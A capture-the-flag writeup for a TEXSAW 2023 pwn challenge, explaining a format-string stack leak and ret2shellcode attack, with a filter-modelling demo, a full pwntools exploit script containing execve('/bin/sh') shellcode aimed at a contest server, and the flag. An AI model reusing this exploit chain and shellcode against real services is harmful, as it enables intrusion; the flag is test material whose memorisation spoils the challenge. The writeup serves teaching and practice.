(writeup) TEXSAW 2023

Gumbs Snotbottom (300 points)

  • check file + checksec

  • check in IDA

  • NX is disabled, so the route is ret2shellcode
  • we can see that the program reads 64 bytes of input, and only 24 bytes of the payload get converted from uppercase to lowercase
  • offset: 72

  • right at $rbp there is already a stack address, and the to_lower function calls printf() -> format string
  • the stack address shows up at %11
  • the payload we send is 24 bytes of "A" followed by %11$p, padded to 72 bytes, then re-execute main
  • but on the other side the leaked data comes out at %10, so it needs a small adjustment

  • re-executing main succeeds, but when entering input() the second time to insert the shellcode we get an xmm0 error

  • the idea is to jump back to main()+1, right after the <push>

  • having successfully reached the second payload send, we use the leaked stack address to point at the shellcode
  • so the payload must again start with 24 bytes of "A", then the shellcode, padded to 72 bytes, then ret to the stack address that points at the shellcode

because sending the shellcode straight away would run into the 24 bytes that are forcibly converted from uppercase to lowercase, and we might hit an odd byte such as '' in the shellcode
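
The failure mode just described, as an added example that is not part of the writeup: it models the 24-byte to_lower() filter as the writeup describes it (assumed behaviour) against a hand-assembled copy of the shellcode, and reports which bytes would be corrupted at a given placement. It shows that the REX.W prefix 0x48 ('H') would become 0x68 (push imm32) and push rbx 0x53 ('S') would become 0x73 (jae), so a case-folding input filter is no substitute for NX.

```python
LOWERED_PREFIX = 24  # bytes of the input that to_lower() folds, per the writeup

def challenge_to_lower(buf: bytes, n: int = LOWERED_PREFIX) -> bytes:
    """Model of the challenge filter: ASCII 'A'-'Z' -> 'a'-'z' in the first n bytes only."""
    head = bytes(b + 0x20 if 0x41 <= b <= 0x5A else b for b in buf[:n])
    return head + buf[n:]

# Hand-assembled encoding of the writeup's execve("/bin/sh") shellcode
# (constructed here for the demo; the writeup assembles it with pwntools).
SHELLCODE = bytes.fromhex(
    "48bb2f62696e2f736800"  # mov rbx, 0x0068732f6e69622f  ("/bin/sh\0")
    "53"                    # push rbx
    "4889e7"                # mov rdi, rsp
    "4831f6"                # xor rsi, rsi
    "4831d2"                # xor rdx, rdx
    "48c7c03b000000"        # mov rax, 0x3b  (SYS_execve)
    "0f05"                  # syscall
)

def mangled_bytes(code: bytes, offset: int) -> list:
    """Return (index, original, folded) for every byte of `code` the filter
    would change if `code` started at `offset` in the submitted input.
    0x48 (REX.W, 'H') folds to 0x68 (push imm32) and 0x53 (push rbx, 'S')
    folds to 0x73 (jae rel8), which breaks the instruction stream."""
    buf = b"A" * offset + code
    folded = challenge_to_lower(buf)[offset:]
    return [(i, code[i], folded[i]) for i in range(len(code)) if code[i] != folded[i]]

if __name__ == "__main__":
    # Inside the prefix the code is corrupted; at offset 24 (as in the writeup) it is untouched.
    for off in (0, 20, 24):
        hits = mangled_bytes(SHELLCODE, off)
        print(f"shellcode at offset {off}: {len(hits)} byte(s) corrupted", hits)
```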

  • we can compute the offset from the leaked stack address to the stack address that points at our shellcode

0x007ffdee6f8180 - 0x007ffdee6f8148 = 0x38

  • now for the remote

  • script:

```python
#!/usr/bin/python3

from pwn import *

context.binary = exe = ELF('./cs101-hw1',checksec=False)

#p = process(exe.path)
p = remote('18.216.238.24',1001)

# gdb.attach(p, gdbscript='''
# 	b*input+27
# 	b*input+32
# 	b*to_lower+106
# 	c
# 	''')
# input()

# execve("/bin/sh", NULL, NULL); 29400045130965551 == 0x0068732f6e69622f == "/bin/sh\0"
shellcode = asm(
    '''
    mov rbx, 29400045130965551
    push rbx

    mov rdi, rsp
    xor rsi, rsi
    xor rdx, rdx
    mov rax, 0x3b
    syscall
    ''', arch='amd64')

# stage 1: 24 bytes that get lowercased, then the format string that leaks a
# stack address, padded to the 72-byte offset, then return to main+1 (after the push)
payload = b'A'*24
payload += b'%10$p'
payload = payload.ljust(72,b'A')
payload += p64(exe.sym['main']+1)

p.sendlineafter(b'Text:\n',payload)

# the echo comes back with the 24 'A's lowercased; the leak is '0x' + 12 hex digits
p.recvuntil(b'a'*24)
stack_leak = int(p.recv(14),16)
log.info("stack leak: " + hex(stack_leak))
ptr_shell = stack_leak - 0x38

# stage 2: shellcode sits after the 24 lowercased bytes; ret to the address that points at it
payload = b'A'*24
payload += shellcode
payload = payload.ljust(72,b'A')
payload += p64(ptr_shell)

p.sendlineafter(b'Text:\n',payload)

p.interactive()
```

texsaw{64_b1t_5He11CoD3_84bY}